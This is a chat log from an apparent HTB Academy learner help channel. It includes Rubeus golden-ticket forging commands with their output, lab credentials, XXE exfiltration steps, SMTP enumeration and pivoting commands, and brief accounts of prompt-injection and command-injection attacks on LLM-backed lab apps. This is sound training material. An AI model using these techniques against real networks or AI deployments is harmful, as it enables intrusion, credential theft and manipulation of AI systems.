#modules

still stuck on that section and wanting help

maybe search HTB forums or try to check old messages on this section, you will likely find an answer

Holy shi, assesment on PassAttacks was awesome

The module wasn't that consistent for me, but the assessment - masterpiece, it was fun. Thanks for all the help!

Run the install script line by line; its annoying but it breaks running it as a script

@fathom pendant Thank you, I just found the creds (even tho I knew it was like in the example lol), I will be running line by line

thanks again

Module is above tier 0 so im deleting your other message

Is there a htb live support ?

I'm sry I didnt saw the rule

Are we able to ask questions here about specific aspects of labs in the HTB Academy?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

as long as it doesn't actually spoil any information for modules above tier 0; consider any information you had to dig for/find/enumerate as a spoiler

Yeah that's why I wanted to ask first. It's a question on a specific command in the CPTS Password Attack module. So I wanted to ensure I didn't spoil something or make HTB upset because it references what is in the "solution" button

i'm curious what you mean shoot me a dm and i'll see if I can clarify something; the solutions (at least in my opinion) don't really do any bit of explanation as to why it works (that's left to the reading, most of the time)

Ok, I will message you

Hi, Samuel, I am doing this seccion

Hi Everyone, I am trying to do RDP and SOCKS Tunneling with SocksOverRDP, but I have a problem with this section, I execute the dll and it was successfull, but when I try to connect by RDP to the machine 1, I have the message "Remote Desktop cant connect to the remote computer"
I am in the pivote windows
kali - 10.10.14.205
pivote windows - 10.129.X.X (I did all and was ok, but I cant connect to machine 1 by RDP)
machine 1 - 172.16.5.19 victor:pass@123
machine 2 - 172.16.6.155 jason:WellConnected123!

how can I connect to 172.16.5.19 from windows pivote 10.129.X.X?

The reading indicates a machine in the middle

Hello, I have a question regarding understanding Log Sources & Investigating with Splunk. The question asks: "find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests." While I got the answer I am unsure regarding the difference between event ID 4768 and 4769 and why they both give vastly diff answers.

4768 is TGT request and 4769 is TGS request.

Essentially:
4768 - First Kerberos Authentication request.
4769 - Subsequent Kerberos Authentication requests to other services. (which in this case the logged account name also shows the services they'd be accessing)

The users can use the same TGT to get multiple TGSs depending on how long the TGT is valid for which creates the difference in counts.

Ohhh ok that makes sense

Thanks

Can anyone help me with the Prompt Injection Attacks Skills Assessment ? I have successfully removed the CEO, not been flagged as malicious using the admin panel and made the LLM output a summary with no flag.

SocksoverRDP - can someone help me with this?

I am doing SQLMAP ESSENTIALS - attacking tuning for the first question I got the flag but it's not right the hint says to run it multiple times and I did but it still give the same in correct format at the end `A7}

known thing, please don't share commands, as that's also part of figuring out the environment

Hi! Stuck on LLM Output Attacks Skills Assessment (LLMPics).

Got admin_key via SQLi on Imagebot, accessed Adminbot.
Tried command injection on calculate_shipment_time - get "Invalid JSON response" but can't see output.

Hint says "Pay attention to function names and admin username" - what am I missing?

Module Name: Active Directory Enumeration & Attacks > Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Im unable to Perform ExtraSids Attack even though i match the requirements and got klist same

.\Rubeus.exe golden /rc4:9d765b482771______97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
...
[] Generating EncTicketPart
[] Signing PAC
[] Encrypting EncTicketPart
[] Generating Ticket
[] Generated KERB-CRED
[] Forged a TGT for 'hacker@LOGISTICS.INLANEFREIGHT.LOCAL'
...
[] base64(ticket.kirbi):

  doIF0zC....C5MT0NBTA==

[+] Ticket successfully imported!

PS C:\Tools> klist
Current LogonId is 0:0xc67b4

Cached Tickets: (1)

#0> Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 1/29/2026 22:08:31 (local)
End Time: 1/30/2026 8:08:31 (local)
Renew Time: 2/5/2026 22:08:31 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

But when i ls to try to access it shows:
ls \\academy-ea-dc01.inlanefreight.local\c$
ls : Access is denied
At line:1 char:1

• ls \academy-ea-dc01.inlanefreight.local\c$

•   + CategoryInfo          : PermissionDenied: (\\academy-ea-dc01.inlanefreight.local\c$:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
  
  

ls : Cannot find path '\academy-ea-dc01.inlanefreight.local\c$' because it does not exist.
At line:1 char:1

• ls \academy-ea-dc01.inlanefreight.local\c$

you can dm me if you want 🙂 but maybe your instance went bust, try restarting it

need a lil help with skills assessment on pivoting tunneling

struggled a lot with rdp throughout the module,,,proxychains and rdp do not seem to go hand in hand

make sure you disabled real-time protection in windows security

yeah i did that to resolve the issue

can u pls help me with skills assessment

i cant rdp😭

https://tenor.com/view/dog-crying-meme-doggo-crys-megan-soo-crying-dog-gif-5276199764143986284

unfortunately, i skipped skills assessment for now, i would help if i knew it

Hello everyone

Could someone help me this question? I'm leaning about basic knowledge then, The website instructs about ParrotOS Security System but It doesn't have HTB - your own personalized Pwnbox option. so how can I get this.

Anyone who did the introduction to windows evation module ?

Windows Lateral Movement, Skill Assessment, Q5 "What is the password for VNC?"
I am trying to craft a payload on ||WSUS||, but I get error: "Function error - FbGetComputerTarget. Error Message: The EXECUTE permission was denied on the object 'fnGetComputerTargetID', database 'SUSDB', schema 'dbo'."

any hint? thank you 🙂

EDIT: it looks like this is not a "blocking" error message... I was able to push the update anyway 🙂

I am never able to rdp with proxychains when using dynamic port forwarding..any idea why?
Someone suggested to use pwnbox for this skills assessment but still tryna find root cause

Please refrain from posting content from modules above Tier 0. A spoiler tag does nothing.

You should be fine using the provided payload from the case study and as long as you compiling it as per the instructions it should work for you. Can also test them out before shutting down the DEV host if you are using it.

That's the thing the thing it worked fine on the dev but it won't work in the victim machine. And btw how do you get the IP of the dev machine I always go back to section 1 and start the machine to get it's IP and it's very tedious and for delivery I spawn a python http server

I likely just had one tab open with the section that provided the DEV host and another that I used to progress through the module.

You can DM what you are trying and I can compare it to what I got to work, but it was legit straight from the module.

Alright I will retry the one it and let you know

Trilocor

Heyyy, In SQLMap Case#5 under Attack Tuning i got the flag but it is saying incorrect, can anyone please recheck it for me in DMs ?

Rerun it, as sometimes when the flag is being printed, a character or 2 might get missed or skewed.

i tried but i am getting the same thing

You can DM what you have.

Hey what happened to Parrot os HTB edition

I can't find it on the website

I've reported it. It looks like it was updated and then removed.

Hello

can I download the content of the modules?

https://tenor.com/view/hello-gif-13062150862685254762

Hii all

hi

Everything you posted in this channel, aside from the question about downloading the content of the modules was not necessary or related to any HTB academy modules or sections.

where is the anser

Do you see a feature that allows you to download the content of the modules? Should be able to answer this yourself.

no i don't

Quit spamming this channel. You can ask support if you need more information than what I have provided.

are you from support?

It will be released again with 7.1

No I am a community contributor.

Peace guys, I’m currently stuck on module “JavaScript Obfuscation” I’m on the 2nd flag and it’s not accepting my answer. I’ve put HTB {} and nothing. Any tips?

same problem how did u slove it ?

Hello, i might need some help with the Unrestricted resource Consumption part of the API attacks module. Not sure how much i can share to avoid spoiling the module, but my approach has been similar to the broken authentication section, trying to fuzz the OTP.

It will likely come with parrot 7.1

It was actually available in https://deb.parrot.sh/parrot/iso/7.1/ for a few moments, but was removed since it had some issues

It tried again and it worked this time and I didn't change the code just recompiled it lol. Previously in the log it would show that it is running but I won't get checking for calculator now it got it in the log and got a shell that's some really weird behavior xD

a quick doubt inorder to access the linux machine the modules in ad section mention us to rdp into Ms01 then ssh into 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt! .. this seems not to be working .. any idea?

in Active Directory Enumeration & Attacks module

i dont know if this is the right place to ask but my module 'html POST' is not resolving cloudfare and seems to break and show errors in dev tools. pinging cloudfare has 0 packet loss within vm. has this been an issue before?

Which section?

Its coming again in 7.1, its security edition with some fancy looks

Hi all, I am stuck at the thick client assignment in cwes. When I start xbug64 and want to select an address it keeps moving. I tried to pause all threads, paused all selected data without any result
I also cannot find a way to filter on MAP and RW
Tried perplexity ans chatgpt to help. No luck. Can someone point me in the right direction? Thanks already

Hey I'm on the Kerberos Attack - Skill assessment part can i dm someone to get help ?

You should run that command as administrator

I am currently doing the PMKID Attack section of the Attacking WPA/WPA2 Wi-Fi Networks module, I successfully cracked the hash with hashcat but when I provide it as the flag it does not get accepted.

Try manually typing, make sure no whitespace etc

Lol now after refreshing the page suddenly the question is marked as complete 😂

Hi everyone, hope you’re doing well.

I’m working on a lab involving Tiny File Manager, and according to the module, the expected vulnerability is Command Injection, so that’s what I’ve been focusing on.

What I’ve done so far:

Identified that the Advanced Search feature sends an AJAX POST request.

Intercepted the request with Burp and confirmed parameters such as content, path, type=search, and ajax=true.

Tried multiple inputs and variations while observing response behavior, timing, and errors, but I haven’t seen any clear indication of command execution yet.

Reset the instance to rule out caching or a broken environment.

At this point, I’m struggling to understand where command execution might occur in this feature, or what kind of behavior I should be looking for to confirm a successful injection.

If anyone could provide a conceptual hint or point me in the right direction (without spoilers), I’d really appreciate it.

Thanks in advance for your help.

Hey everyone. A little stuck on the Linux Forensics course. Anyone have an idea about this q? "What is a session uuid(-U) for a meterpreter agent? Provide answer as base64 encoded value."

hey yall, I've launched an instance and was trying to log in via SSH but it keeps timing out. I have tried resetting the target twice but that doesn't change anything, has anyone run into this and have a fix?

Not to be annoying if this is too basic but are you connecting from the Pwnbox or connected to the VPN?

not annoying at all, only been at this a few weeks! Im using the Pwnbox.

I also tried resetting the instance, and that doesn't seem to have fixed anything.

Interesting. What happens if you ping it and what is its IP/your ssh command?

Its just sitting, I assume it will come back timed out.
my PC was updated last night so I'm trying to see if any settings were updated.

If you are on the pwnbox your computer shouldnt matter as the pwnbox should be running on a network that has access to it. you could restart both the target and pwnbox. Otherwise you could see if the pwnbox has a route to that server by typeing "route". From there you could ping the gateway for that ip range to see if maybe the gateway is down..... actually as I say all of this... It may be easier to try to switch to a different location for the pwnbox (maybe something funky is going on). Also make sure you arent supposed to ssh into a non-standard port maybe?

i have tried resetting the target and pwnbox a few times now with no luck, and if i terminate it ill have to wait for tomorrow (because im poor, lol), so changing locations would have to wait as well.
I pinged the gateway and it seems to be going through just fine.

in terms of "ssh into a non-standard port" I dont see any instructions along that line.

today is probably a wash. it going to time out in 30 minutes. If it doesn't work tomorrow I may try setting up for the VPN method.

if it says to connect using a non standard port then sometimes there are no instructions and its good to learn each of the flags you can with the tools that you are to use. if it says to use another port then this could be why its not working because your command is for the default port since its not specified in your command. for example. your command should be:

ssh -p <portnumber> htb-student@10.129.16.151

the default port is 22

Did anyone ever find an answer to this? I'm having the exact same problem

Unfortunately I do not remember lol that was a long time ago

🥲

from what i can see no one ever answewred you back then either lol

hello there,
in the Web Attacks module, under XXE - Advanced File Disclosure, I’m trying to understand a specific behavior.

why are we able to retrieve files like the /flag.php or /etc/hosts, but not /etc/passwd, whether using file://, php://filter/..., or even a combination of error-based XXE + CDATA (file:// one)?

the only method I’ve found that successfully exfiltrates /etc/passwd via error-based XXE is the following multi-step approach:

• first, trigger an error-based XXE using a reference to a non-existent file
• then, redirect the entity to a joiner (commonly named joined)
• wrap the output using a CDATA payload
• inside the CDATA file, use php://filter for encoding

is there like a specific parsing or encoding constraint that explains why the simpler approaches fail for /etc/passwd but work for other files?

I used ligolo

thats how the module is structured. you use ligolo to setup the tunnel inside the internal network, and ntlmrelayx setups a socks server

Right, I thought you were using proxychains. Maybe I misread your issue.

no, i was. thats part of the attack chain

Try some of the first things covered in that section.

ligolo gives access to ntlmrelayx, ntlmrelayx's attack sets up a socks proxy, so you use proxychains4 as to connect via mssqlclient

Ah, yeah looking at my notes now.

So you are having issues with it connecting after performing ntlmrelaying?

yea

You can DM what you are trying.

netlmrelay worked. then the next step is to connect via mssqlclient

any1?

lol i've tried everything

Shoot me a DM with what you have tried. Probably minor.

/etc/passwd often contains characters like : and / so, they may cause some things to break

Hey all: working on the ⁨attacking common applications -> Exploiting Web Vulnerabilities in Thick-Client Applications⁩ I've modded the server on the fatty-client and logged in. I'm at the point where I have to modify the code again in a "test.java" file. It has the a bunch these comments at the front of the line, and it's been a while since I've written java code. Will those comments at the front of the line cause problems?

There's no reason for them to cause any problems especially as Java is a compiled language.

I have question for any course from silver annual subscription. does the completed course will be forever accessible to me once completed them like it was buying with cubes? or it access will expire once the annual subscription ends? thank you.

Every module you complete during your subscription is unlocked for you to keep forever. So not the whole course, but the individual subscriptions. If you complete all the modules then you'll have them all.

Does it included access to exercises and assessment too? I can keep accessing them to practice, recall the lesson even after the subs expires?

the entire module is unlocked forever, everything included

just complete the module 100%

That's wonderful.❤️

Hey everyone. A little stuck on the Linux Forensics course. Anyone have an idea about this q? "What is a session uuid(-U) for a meterpreter agent? Provide answer as base64 encoded value."

the comments are just line numbers, but no they won't cause issues

I have some confusion in the reporting following the method for using sysreptor's reporting suggestion. which one should be filled out?

once again trying the skills assessment on pivoting module and I cant manage to rdp with proxychains ...am using ssh dynamic port forwarding

can anyone pls help me out

what part are you? would you like to consider other pivoting method aside ssh? I'm looking on my notes and don't remember the need to use rdp here. You may want to reconsider. However, this kind of lab might be having a tons of problem using proxychains you might want to debug what kind of error you are receiving. like do you have proper ports being forwarded pivot to pivot? is rdp allowed?

fourth ques

we gotta pivot to the discovered host, 172.16.5.35, and submit the contents of C:\Flag.txt

port 3389 is open on this internal host

[proxychains] Strict chain ... 127.0.0.1:9050 ... kerberos.mit.edu:88 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... kerberos-1.mit.edu:88

xfreerdp is trying to contact external Kerberos servers (MIT's public Kerberos servers) through SOCKS proxy, which is timing out.

if its me, I will try another pivoting method

I will try meterpreter port fwd

Check the module again. You have to fill everything in.

bruh I finished everything for the SQLMAP BESIDE Flag 5 last time it didn't give any answer now it's just not there at all lmao

nvm I had to restart and try a couple of times

jezz

Hello everyone, where can I ask questions to get help with unsolved problems in the Academy modules?

You can ask here. If someone can help you, they will get in touch with you.

Thank you. Since this is my first question, please let me know right away if there are any precautions I should be aware of.

Ask your question in this way.
I am on module X, section Y. I am stuck on question Z. I have tried various things that were discussed in the module, but I am stuck. Who can help me?

⁨```
If we disable port scan (-sn), Nmap automatically ping scan with ICMP Echo Requests (-PE). Once such a request is sent, we usually expect an ICMP reply if the pinging host is alive. The more interesting fact is that our previous scans did not do that because before Nmap could send an ICMP echo request, it would send an ARP ping resulting in an ARP reply. We can confirm this with the "--packet-trace" option. To ensure that ICMP echo requests are sent, we also define the option (-PE) for this.

if -sn is enabled nmap sends ICMP Echo Request automatically but before that it sends ARP ping is sent

I don't understand ⁨`we ensure part`⁩ here  
why put -PE again since itr automatically sends ICMP Echo by default?

https://academy.hackthebox.com/module/19/section/101

https://giphy.com/gifs/spongebob-slow-patrick-bottle-2ohfKrgoRPYbRMVQfB

that's me, tell me if I am missing anything

.

Hi everyone, Is there an issue with the Active Directory Enumeration & Attacks machine? I cannot ssh ino it.

Can’t rdp into the machines in this module “Windows Event Logs & Finding Evil” i’m using the pwnbox and i’ve also tried using the vpn but i still get the “Invalid Sigil error”

I’m also using the provided command to rdp into the session but it is still not working

try switching TCP variant of the VPN

Ty

How can we reduce the lag on academy, everyone? I feel very frustrated because of the lag (especially when remoting into machines via RDP).

just finished skills assessment for pivoting
I am trying to understand how we have 2 diff interfaces here when they would quite possibly have the same ip addresses on both ? both have subnet masks 255.255.0.0 so both gonna have 172.16.0-255.0-255 or 172.16.0.0/16 ip address

still need help? DM me

Is there any problems with HTB servers? doing some modules, but when i spawn a "instance" (Pwnbox) for the labb, i can reach it for the first 30 secs then its cuts all out.

Yes, same problem here. Impossible to use the AD LAB for more than 30sec.

Hi i need a hint for Credential Hunting in Network Shares

Ahh then i know its not only me atleast 🙂

Iirc snaffler did the trick for me

Try Changing vpn regions @charred mountain @olive depot

i am using the snaffler and i find a lot of passwords and no one works

Gimme a sec to pull it up and remind myself how I went through it.

ok thanks

I don't know for @olive depot , but for me the problem is inside the AD lab. The Pwnbox is OK.

After connecting to the target machine via SSH, the system crashes after executing a few commands.

The first Question; the hint is in the question domain think of how domain usernames are structured
The Second Question; similarly the hint is in the question asking you for Domain Administrator
Both will require some filtering to find

okay thanks i will try

The second requires the credentials you find from the first as an fyi

I will say the powershell method ends up being a lot faster; but it works just the same with nxc

What? They are different IP's and subnets.

Hey, Anyone knows how much the AD Penetration Tester path costs if I’m using the Gold monthly subscription?

Yes.
(Total path cost / monthly cube gain) * monthly price

just completed the nmap module

the IDS stuff was pretty fun and not as bad as I expected

Its the same network?

Alright I've been putting together my AD enumeration and attack methodology. Ripped it from a few youtubers and from my own notes. Am I missing something?

bro how

those were so hard for me

You can see from the output they are on different subnets of the network

all of the stuff they quiz you on is taught in the module so I just referred to notes

We generally dont allow sharing of random files

@lime cosmos AEN is above tier 0, I dont recall running into too many restrictions.

Windows Lateral Movement -----> Windows Server Update Services (WSUS)

i'am facing this issue even tho i have done multiple reset on the lab

weird ... anyone faced this issue before in the module or know a possible fix ?

👀 another reset for sanity check and still same issue !!!!

Are you running it on the correct machine?

Hey Y'all. I am working on the "Shells and Payloads" module, "The Live Engagement" in htb Academy, on the Penetration tester path. After starting VMs and RDP into the target, which is a MATE desktop environment there is no web browser? I've tried this over my VPN connection w/kali and the Pwnbox. In the walkthrough Host-1 hint: it says to " if you look at status.inlanefreight.local or browse to the IP on port 8080" But there is no web browser, there is a TOR browser but the box is not internet connected. And I used RDP to the Foothold host. Any help would be appreciated...

that's not a public host, so you should be able to connect to it if you can resolve it. maybe try firefox-esr?

Cool. i was able to use firefox from the command line, thank you!

Ethernet adapter Ethernet0:
IP Address: 172.16.5.35
Subnet Mask: 255.255.0.0
Default Gateway: 172.16.5.1
Ethernet adapter Ethernet1 2:
IP Address: 172.16.6.35
Subnet Mask: 255.255.0.0

both are on the 172.16.0.0/16 network

Except its not a /16 network, its a /24. Ik it seems misleading, but they are separate networks

Umm how did u find out its a /16 network?

hey all. I"m having an issue in the WEP module, with the ARP Replay Attack section. I've followed all the steps, but when I run the aircrack on WEP-01.cap, it's running into a segmentation fault and doesn't find the key. It also only finds only a handful of IVs, instead of in the example where it finds 97822 out of 95000 (which I have questions about, mathematically speaking).

I've restarted the terminal something like 7 times, and it has this issue every time

MSSQL, Exchange, SCCM skill assessment: I need a nudge on Q3 if anyone can help

subnet mask

255.255.0.0 is /16. Just as 255.255.255.0 is /24. or 255.0.0.0 is /8. as you can see, there is a partner. it can be confusing as to how a subnet mask works, but the short answer is you are allocating bits to the host and client. NetworkChuck does a good video on YT on it if you're interested.

Ik about subnet mask
Its just that in the photo it is 255.255.0.0 but marcielee is saying its a /24 network not /16

Looks like they're wrong, it is /16 but both interfaces are on the same network. That's possible

Active Directory Enumeration & Attacks module, Skills assessment part 1
after gaining administrative privileges on || MS01 || i can't seem to find answer for question 4
⁨⁨```
Find cleartext credentials for another domain user. Submit the username as your answer.

it feels like i tried everything but still could not get it, any nudge would be appreciated

PRTG Network Monitor cant get a code execution to work i think

can anyone help

nevermind, i got it i am not sure but i didn't see this method in this particular module, but anybody who is wondering the answer, revisit password attacks module

What module are you doing?

Attacking Common Applications

Did you look at the Notifications function and add a new notification for execution of scripts? if so what script are you running?

probs DM me dont wanna spoil

I am on Windows escalation skill assesment p1, trying to run exploit suggester but its not working for me:
⁨⁨```
python2.7 windows-exploit-suggester.py
--database 2026-01-31-mssb.xls
--systeminfo sysinfo

⁩
I just pasted the output of the systeminfo file to sysinfo.

This is the error I am getting:
⁨```
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[-] unable to determine the windows versions from the input file specified. consider using --ostext option to force detection (example: --ostext 'windows 7 sp1 64-bit')
```⁩

Is it just not recognizing the system version from the output?

Sort of; the way the module behaves is as if its a segmented /24, not a /16

So some other logic is taking place to segment it

Ohhh yeah I remember that module... it seemed to be a difference in the router/switch configuration and the host itself which clearly was manually set.

Its really dumb though

Yeah I wouldn't expect this stuff in real environments cos who wouldn't just use DHCP unless it's that type of server.

And definitely confusing to people that have a base knowledge of segmentation

Usually only dedicated devices arent on DHCP

Yeah I'm familiar, but as far as I can remember that wasn't a dedicated server.

Reminds me i need to set a static ip for my dad's printer

Also yeet it into it's own vlan

Yeah in the practice context, setting ips manually is far better to ensure reliability of internal communication.

That's a lot of work I dont wanna do, and end up breaking. Setting a static is enough for me. Beyond that is just asking to be IT

only if you're using the IPs directly, usually though DNS is involved and that can work with DHCP to esnure network connectivity

Yeah, it works fine as is

works much better in msfconsole, have u tried doing it that way?

Hello, I think I need some help with information gathering - virtual hosts, is this the right place to ask questions? :)

New versions of the seclist repo no longer contain the web one in the top1million, you can however use grep -e -h "^web" *.txt | sort -u > web.txt on the wordlists in the repo to get it; so as to not spoil i wont say which one the answer lies in

If you want to know what those do you can man grep and look for the options I mentioned, similarly man sort

If that was your question, if not https://dontasktoask.com

so my problem is that everything seems to work but I am not getting any "found", i tried adding the target with the inlanefreight .htb /etc/hosts but it does not seem to change anything either

I’ve tried:

• ffuf vHost fuzzing with -fs 116
• matching status codes
• comparing response hashes against the baseline
  All responses still appear identical, so I can’t isolate the correct web* etc

How are you fuzzing for vhosts? Are you doing the -H "Host: FUZZ.inlanefreight.htb"? Secondary note; if the sizes are all the same, then that likely indicates what you need to filter out 😉

Yep - I’m fuzzing using -H "Host: FUZZ.inlanefreight.htb".
I checked the default response first (size 116), and since all responses were the same initially, I filtered that size out with -fs 116 to isolate real vHosts.

Module -> Introduction to windows command line : Skill Asessment

⁨⁨SSH to 10.129.xxx.x (ACADEMY-ICL-SKILLS11) with user "user2" and password ""⁩⁩

I just press enter when prompted for password, yet it says permission denied. Am i doing something wrong? I feel maybe I have to switch to user2 by logging in to user1 first (password for user1 is not "")

password is the answer found in user1 question

ty!

The question doesn't mention this at all

Not really, but I will keep that in mind. Thanks🍻

Is ⁨certi⁩ able to find the URL where CA hosts web enrollment page or is it only able to identify that whether DC has CA enabled or not

ok looking at the WEP ARP replay attack... I keep getting this segmentation fault after I run aircrack on the WEP-01.cap

hi i need a hint for the PtH question 6

Follow the section

Hi Guys, I am stuck at Sliver C2 Skills Assessment. I got the administrator access on SRV09 and got the dbuser creds for DC02 and able to login through mssqlclient.py, but when i try to upload the pivot exe file to DC02 it is giving me an error, file not found. I feel some AV is blocking the connections. Can you pls point me the direction to move forward?

I am doing nc but i can't get the shell

i followed the section

This is the reverse shell question?

yes

hi can someone help me with Pivoting, Tunneling, and Port Forwarding Skills Assessment the last question i cant access the share and im confused how to continue...

Using Julio's hash, perform a Pass the H ........

Skills assessments were goated!

You can send me a DM with what you are trying.

@gray yacht can i shoot you DM on what i saw in the skills assessment

stuck on 'The Live Engagement' for Shells section. i uploaded cmd.war from /usr/share/laudanum/jsp to the WAR file to deploy in /manager and i'm not sure what to do next.

Try to open your upload in a new browser tab.

Sure

thanks, this was my next thought however i get the http 404 error

What's a 404 error?

You can shoot me a DM, so we can chat a bit more freely

Check the privs/groups of your owned users.

no i still dont get a connection to the dc because of the two network interfaces in the solution is only mentioned to click on the share but i dont manage to get a connection my mind says i should use proxifier i dont know i actually have no clue

You can shoot me a DM.

Anyone experienced with all labs. Wi-Fi penetration tester patch slow or lag?

They can be a bit laggy, especially the RDP connections. You can also use the creds to SSH into the targets instead of using the RDP connection.

Wow big thank bro

How do you make your notes in HTB and how do you sort it bc I am not sure if i should rewrite my notes more effizient

Hi everyone, I'm currently busy with the Network Foundations module, and I'm getting stuck at a question in the Wireless Networks section.

Question 5 specifically, which is "What manages multiple cell towers in cellular networks? (Format: three words)". The answer is Base Station Controllers, but whenever I submit, it says that it's incorrect and I cannot complete the section.

Could someone help me please?

@tender parcel Please take care not to post content from modules above tier 0

Fixed the issue. Thanks guys

Let’s say I have pivoted to an internal network via ligolo . I wanna execute a Metasploit exploit (which requires LHOST , LPORT, RHOST fields) on a target in the internal network . Is it possible to receive the Meterpreter session in my atatcking machine ? If yes how ? Which IP should I specify as LPORT and LHOST ?

I have a video on this you can check out.

Can I have the link for it please ?

Should be in my description

Which video are you referring to ? Accessing local host ports ?

Oh the reverse she’ll most probably you mean

It would likely be reverse shells and file transfers

Good Video but this is not exactly what I meant

You can DM what you are having issues with.

Hi everyone, im doing the Password Attacks module, Credential Hunting In Network Traffic section and i keep getting issues opening up the associated pcap file (demo.pcapng). The wireshark error says "Dissector bug: Invalid leading...". Any suggestions for how to fix?

I think the capture file is corrupted

more like wireshark problem for me

what version of wireshark are you using?

i am running 4.4.6

https://medium.com/bug-bounty-hunting-a-comprehensive-guide-in/how-to-fix-wireshark-errors-on-linux-the-complete-guide-7ea25af0305d

found a medium article try these fixes if you can

thank you very much

I needed to update Wireshark (updated to 4.6.3). Thanks everyone for the help

is it me or the academy's box are kind of slow ? I'm making sqlmap and the requests are giving timeout so I had to do the sqli manually

because the tool don't work with requests giving timeout over and over.

Also having this same issue. Can't find any replies to this, so does anyone know what I am missing as well? Found this talked about under CDSA. G2G

Don't work too far ahead, each flag has a place

I"m wondering if this is causing my issue I posted above. I'm going to try to ssh in and see if it'll work any better.

Nope, still getting a segmentation fault. I don't understand why I'm getting that.

Yes is better. But I still need RDP to get the flag.

SMTP Username Enumeration — Module 112 / Section 1072

Hey everyone, documenting everything I’ve done so far to avoid any missing context.

Target IP: 10.129.22.87
Service: SMTP (25)
Domain identified: YES

1️⃣ Wordlist access in HTB VM
Tried downloading the provided wordlist:
wget https://academy.hackthebox.com/storage/resources/footprinting-wordlist.txt
Result: 404 Not Found

Confirmed it doesn’t exist locally:
locate footprinting-wordlist.txt

Verified available lists:
ls /opt/useful/seclists/Usernames
Used SecLists usernames since the provided wordlist isn’t accessible in the VM.

2️⃣ smtp-user-enum (default timeout)
smtp-user-enum -M VRFY -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25
smtp-user-enum -M EXPN -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25
Result: 0 results

3️⃣ Increased timeout
smtp-user-enum -M VRFY -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25 -w 15
Result:
root exists
mysql exists

Neither is accepted by the Academy validator.

4️⃣ Large list without domain
smtp-user-enum -M VRFY -U Names/names.txt -t 10.129.22.87 -p 25 -w 15
~10k users
Very slow
No useful results initially

5️⃣ Domain specified (works)
smtp-user-enum -M VRFY -U Names/names.txt -t 10.129.22.87 -p 25 -D inlanefreight.htb -w 15

Result: Many valid users found, e.g.:
admin@inlanefreight.htb
accounting@inlanefreight.htb
adam@inlanefreight.htb

Confirms:
VRFY works
Domain is required
Increased timeout is necessary

6️⃣ Answer attempts (failed)
Tried:
admin, admin@inlanefreight.htb
accounting, accounting@inlanefreight.htb
First enumerated users
With/without domain
None accepted by validator.

Conclusion
Enumeration method is correct
SMTP behavior understood
Results are valid
Issue appears to be answer expectation or lab validation, not technique

Looking for confirmation on the expected username format or whether the lab/validator is out of sync. Any guidance appreciated.

The wordlist is in the "Resources" section. https://academy.hackthebox.com/storage/resources/Footprinting-wordlist.zip

yeah, the ssh works better, but I'm still having the same errors when I run aircrack. intensely frustrated by this not working

Sudo?

Yes, I run with sudo. I also tried going to root with sudo -s and that didn't do anything different

I learned a lot from this module; however, since I copied footprinting-wordlist.txt and saved it in a nano command file to run via script, I was unable to use the names on the list or locate the file on my local machine. As a result, I still couldn’t obtain any approved answers. Could you clarify the exact output that is expected?

You'll need to run the scan with the lists provided in the module's resources section. If you don't you're not going to get the answer.

Okay. I have attempted to download it, but was unable to through the local machine. Am I atleast on the right track copying the list and running automated scripts? Not sure which direction works, and this is day 6 lol.

Not sure what you mean by local machine

Download it in your VM

or whatever

The VM for the module.

are you using a vm or the pwnbox?

you can just paste the lists into nano or something on a vm or the pwnbox

then save it somewhere and use it

I am using pwnbox. Okay, I have tried that. Re-attempting now.

I am still not getting anywhere with the output: https://imgur.com/a/wX4KzFC

Nothing I type as the answer is ever accepted. No matter what I add or take away from the answers given. This is the question from the module. Maybe I am misinterpreting what is being asked: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

Man i just want to cry; I was doing the " Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php' " mission from Web requests POST part, and wondering why I kept getting empty results even if i was following everything correctly :/ and turned out it just didnt work for some reason on my own pc, but same command worked on the pwnbox.

hngh over an hour fighting for no reason when i thought I was typing something wrong

I wonder if it was checking the user agent and my curl was different version than pwnboxes?

Not likely, there are some targets in web modules that are only accessible on the HTB network however and you might have to be connected to the VPN to connect to them.

idk, it was weird, all the other exercises on the module worked well from my own system's terminal, and the site itself worked on my browser so, it just left me bit confused haha.

if i remeber correctly you only get one answer have you tried to run in with the nmap instead? with nmap and RCPT i get alot of hits and then you can use telnet to test

Hello guys ! at the Using Web Proxies , Burp Intruder i have found the admin/index.html but i cannot find the flag. is the flag on another html file?

Hi All! Can anyone guide me on HTTPS/TLS ATTACKS module, chapter POODLE & BEAST. I've tried following the examples, but I'm getting either ⁨⁨⁨⁨⁨⁨Connection refused⁩⁩⁩⁩⁩ or ⁨⁨⁨⁨NOT_VULNERABLE⁩⁩⁩⁩⁩. Tried both vm and pwnbox. NVM, solved. That very moment when you realise you have mislead yourself

Hi everyone,

I would appreciate some guidance to confirm whether I am approaching this lab correctly.

I authenticated as guest/guest and focused on the Advanced Search functionality, since this is the only feature that logically could involve system-level operations in a file manager.

I captured and analyzed the POST request used by Advanced Search and tested for command injection using multiple techniques (command separators, time-based payloads, and variations placed at the end of user input, as suggested in the hint).

